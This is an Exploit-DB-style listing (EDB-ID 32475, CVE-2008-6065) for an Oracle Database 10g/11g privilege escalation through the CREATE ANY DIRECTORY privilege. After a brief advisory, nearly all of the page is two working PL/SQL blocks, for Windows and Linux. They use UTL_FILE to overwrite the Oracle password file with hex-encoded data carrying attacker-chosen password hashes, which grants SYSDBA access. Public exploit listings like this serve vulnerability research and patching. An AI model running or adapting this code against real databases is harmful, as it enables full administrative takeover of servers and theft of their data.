Exploit Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation

[Exploiter]

EDB-ID

32475

Проверка EDB

1. Пройдено

Автор

PAUL M. WRIGHT

Тип уязвимости

REMOTE

Платформа

MULTIPLE

CVE

cve-2008-6065

Дата публикации

2008-10-13

source: https://www.securityfocus.com/bid/31738/info

Oracle Database Server is prone to a privilege-escalation issue related to the 'CREATE ANY DIRECTORY' user privilege.

Attackers may exploit this issue to gain full SYSDBA privileges on the vulnerable database server.

This issue affects Oracle Database 10.1, 10.2, and 11g; additional versions may also be vulnerable.

--note windows adds 0D 0A to end as cTRL LF
--WINDOWS VERSION 10.1
DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
bu2 varchar2(32767);
bu3 varchar2(32767);
BEGIN
bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b5a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776f72642066696c650000001b004f52434c000000000000000000000000000000000000000000000000000004000100000000000000000000000000000000000000000000000000000000000000494e5445524e414c000000000000000000000000000000000000000000000000080000003736394330434438343946394238423200000000000000000000000000000000100000000f000000000000000000000000000000000000000000000000000000000000005359530000000000000000000000000000000000000000000000000000000000030000003536333832323844414635323830354600000000000000000000000000000000100000000f');
bu3:=hextoraw('0000000000000000000000000000000000000000000000000000000000000000000000000000000782af445359534d414e0000000000000000000000000000000000000000000000000000060000004138443641453346343145463931454100000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004344544553540000000000000000000000000000000000000000000000000000060000003134383041443332443038423045433900000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000');
bu := hextoraw(bu2||bu3);
fi:=UTL_FILE.fopen('TESTPASS','PWDorcl.ora','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/

--linux adds 0A as LF
--LINUX VERSION 10.2.0.1
DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
bu2 varchar2(32767);
bu3 varchar2(32767);
BEGIN
bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b5a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776f72642066696c650000001b004f52434c000000000000000000000000000000000000000000000000000004000100000000000000000000000000000000000000000000000000000000000000494e5445524e414c000000000000000000000000000000000000000000000000080000003736394330434438343946394238423200000000000000000000000000000000100000000f000000000000000000000000000000000000000000000000000000000000005359530000000000000000000000000000000000000000000000000000000000030000003536333832323844414635323830354600000000000000000000000000000000100000000f');
bu3:=hextoraw('0000000000000000000000000000000000000000000000000000000000000000000000000000000782af445359534d414e0000000000000000000000000000000000000000000000000000060000004138443641453346343145463931454100000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004344544553540000000000000000000000000000000000000000000000000000060000003134383041443332443038423045433900000000000000000000000000000000100000000b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000');
bu := hextoraw(bu2||bu3);
fi:=UTL_FILE.fopen('TESTPASS','orapworcl','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/